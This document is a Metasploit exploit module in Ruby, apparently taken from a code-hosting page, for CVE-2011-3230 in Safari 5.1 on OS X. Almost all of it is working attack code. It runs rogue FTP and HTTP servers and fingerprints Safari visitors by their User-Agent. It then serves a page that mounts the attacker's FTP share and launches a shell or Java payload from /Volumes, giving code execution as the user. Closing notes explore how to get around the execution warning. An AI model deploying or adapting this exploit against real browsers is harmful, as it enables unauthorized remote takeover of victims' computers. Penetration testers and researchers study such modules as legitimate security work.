335 lines
8.6 KiB
Ruby
335 lines
8.6 KiB
Ruby
##
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# This file is part of the Metasploit Framework and may be subject to
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# redistribution and commercial restrictions. Please see the Metasploit
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# web site for more information on licensing and terms of use.
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# http://metasploit.com/
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##
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require 'msf/core'
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require 'rex/service_manager'
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class Metasploit3 < Msf::Exploit::Remote
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Rank = NormalRanking
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include Msf::Exploit::Remote::FtpServer
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def initialize(info={})
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super(update_info(info,
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'Name' => "Apple Safari file:// Arbitrary Code Execution",
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'Description' => %q{
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This module exploits a vulnerability found in Apple Safari on OS X platform.
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A policy issue in the handling of file:// URLs may allow arbitrary remote code
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execution under the context of the user.
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In order to trigger arbitrary remote code execution, the best way seems to
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be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or
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a fileformat that OS X might automount), and then execute it in /Volumes/[share].
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If there's some kind of bug that leaks the victim machine's current username,
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then it's also possible to execute the payload in /Users/[username]/Downloads/,
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or else bruteforce your way to getting that information.
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Please note that non-java payloads (*.sh extension) might get launched by
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Xcode instead of executing it, in that case please try the Java ones instead.
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},
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'License' => MSF_LICENSE,
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'Author' =>
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[
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'Aaron Sigel', # Initial discovery
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'sinn3r', # Metasploit (also big thanks to HD, and bannedit)
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],
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'References' =>
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[
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['CVE', '2011-3230'],
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['URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments'],
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['URL', 'http://support.apple.com/kb/HT5000']
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],
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'Payload' =>
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{
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'BadChars' => "",
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},
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'DefaultOptions' =>
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{
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'EXITFUNC' => "none",
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},
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'Platform' => [ 'unix', 'osx', 'java' ],
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'Arch' => [ ARCH_CMD, ARCH_JAVA ],
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'Targets' =>
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[
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[ 'Safari 5.1 on OS X', {} ],
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[ 'Safari 5.1 on OS X with Java', {} ]
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],
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'Privileged' => true,
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'DisclosureDate' => "Oct 12 2011", #Blog date
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'DefaultTarget' => 0))
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register_options(
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[
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OptString.new("URIPATH", [false, 'The URI to use for this exploit (default is random)']),
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OptPort.new('SRVPORT', [true, "The local port to use for the FTP server (Do not change)", 21 ]),
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OptPort.new('HTTPPORT', [true, "The HTTP server port", 80])
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], self.class )
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end
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#
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# Start the FTP aand HTTP server
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#
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def exploit
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# The correct extension name is necessary because that's how the LauncherServices
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# determines how to open the file.
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ext = (target.name =~ /java/i) ? '.jar' : '.sh'
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@payload_name = Rex::Text.rand_text_alpha(4 + rand(16)) + ext
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# Start the FTP server
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start_service()
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print_status("Local FTP: #{lookup_lhost}:#{datastore['SRVPORT']}")
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# Create our own HTTP server
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# We will stay in this functino until we manually terminate execution
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start_http()
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end
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#
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# Lookup the right address for the client
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#
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def lookup_lhost(c=nil)
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# Get the source address
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if datastore['SRVHOST'] == '0.0.0.0'
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Rex::Socket.source_address( c || '50.50.50.50')
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else
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datastore['SRVHOST']
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end
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end
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#
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# Override the client connection method and
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# initialize our payload
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#
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def on_client_connect(c)
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r = super(c)
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@state[c][:payload] = regenerate_payload(c).encoded
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r
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end
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#
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# Handle FTP LIST request (send back the directory listing)
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#
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def on_client_command_list(c, arg)
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conn = establish_data_connection(c)
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if not conn
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c.put("425 Can't build data connection\r\n")
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return
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end
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print_status("Data connection setup")
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c.put("150 Here comes the directory listing\r\n")
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print_status("Sending directory list via data connection")
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month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
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m = month_names[Time.now.month-1]
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d = Time.now.day
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y = Time.now.year
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dir = "-rwxr-xr-x 1 ftp ftp #{@state[c][:payload].length.to_s} #{m} #{d} #{y} #{@payload_name}\r\n"
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conn.put(dir)
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conn.close
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print_status("Directory sent ok")
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c.put("226 Transfer ok\r\n")
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return
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end
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#
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# Handle the FTP RETR request. This is where we transfer our actual malicious payload
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#
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def on_client_command_retr(c, arg)
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conn = establish_data_connection(c)
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if not conn
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c.put("425 can't build data connection\r\n")
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return
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end
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print_status("Connection for file transfer accepted")
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c.put("150 Connection accepted\r\n")
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# Send out payload
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conn.put(@state[c][:payload])
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conn.close
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return
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end
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#
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# Handle the HTTP request and return a response. Code borrorwed from:
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# msf/core/exploit/http/server.rb
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#
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def start_http(opts={})
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# Ensture all dependencies are present before initializing HTTP
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use_zlib
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comm = datastore['ListenerComm']
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if (comm.to_s == "local")
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comm = ::Rex::Socket::Comm::Local
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else
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comm = nil
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end
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# Default the server host / port
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opts = {
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'ServerHost' => datastore['SRVHOST'],
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'ServerPort' => datastore['HTTPPORT'],
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'Comm' => comm
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}.update(opts)
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# Start a new HTTP server
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@http_service = Rex::ServiceManager.start(
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Rex::Proto::Http::Server,
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opts['ServerPort'].to_i,
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opts['ServerHost'],
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datastore['SSL'],
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{
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'Msf' => framework,
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'MsfExploit' => self,
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},
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opts['Comm'],
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datastore['SSLCert']
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)
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@http_service.server_name = datastore['HTTP::server_name']
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# Default the procedure of the URI to on_request_uri if one isn't
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# provided.
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uopts = {
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'Proc' => Proc.new { |cli, req|
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on_request_uri(cli, req)
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},
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'Path' => resource_uri
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}.update(opts['Uri'] || {})
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proto = (datastore["SSL"] ? "https" : "http")
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print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
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if (opts['ServerHost'] == '0.0.0.0')
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print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
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end
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# Add path to resource
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@service_path = uopts['Path']
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@http_service.add_resource(uopts['Path'], uopts)
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# As long as we have the http_service object, we will keep the ftp server alive
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while @http_service
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select(nil, nil, nil, 1)
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end
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end
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#
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# Kill HTTP/FTP (shut them down and clear resources)
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#
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def cleanup
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super
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# Kill FTP
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stop_service()
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# clear my resource, deregister ref, stop/close the HTTP socket
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begin
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@http_service.remove_resource(datastore['URIPATH'])
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@http_service.deref
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@http_service.stop
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@http_service.close
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@http_service = nil
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rescue
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end
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end
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#
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# Ensures that gzip can be used. If not, an exception is generated. The
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# exception is only raised if the DisableGzip advanced option has not been
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# set.
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#
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def use_zlib
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if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
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fail_with(Exploit::Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
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end
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end
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#
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# Returns the configured (or random, if not configured) URI path
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#
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def resource_uri
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path = datastore['URIPATH'] || rand_text_alphanumeric(8+rand(8))
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path = '/' + path if path !~ /^\//
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datastore['URIPATH'] = path
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return path
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end
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#
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# Handle HTTP requets and responses
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#
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def on_request_uri(cli, request)
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agent = request.headers['User-Agent']
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if agent !~ /Macintosh; Intel Mac OS X/ or agent !~ /Version\/5\.\d Safari\/(\d+)\.(\d+)/
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print_error("Unsupported target: #{agent}")
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send_response(cli, 404, "Not Found", "<h1>404 - Not Found</h1>")
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return
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end
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html = <<-HTML
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<html>
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<head>
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<base href="file://">
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<script>
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function launch() {
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document.location = "/Volumes/#{lookup_lhost}/#{@payload_name}";
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}
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function share() {
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document.location = "ftp://anonymous:anonymous@#{lookup_lhost}/";
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setTimeout("launch()", 2000);
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}
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share();
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</script>
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</head>
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<body>
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</body>
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</html>
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HTML
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send_response(cli, 200, 'OK', html)
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end
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#
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# Create an HTTP response and then send it
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#
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def send_response(cli, code, message='OK', html='')
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proto = Rex::Proto::Http::DefaultProtocol
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res = Rex::Proto::Http::Response.new(code, message, proto)
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res['Content-Type'] = 'text/html'
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res.body = html
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cli.send_response(res)
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end
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end
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=begin
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- Need to find a suitable payload that can be executed without warning.
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Certain executables cannot be executed due to permission issues. A jar file doesn't have this
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problem, but we still get a "Are you sure?" warning before it can be executed.
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- Allow user-specified port to automount the share
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- Allow ftp USERNAME/PASSWORD (optional)
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=end
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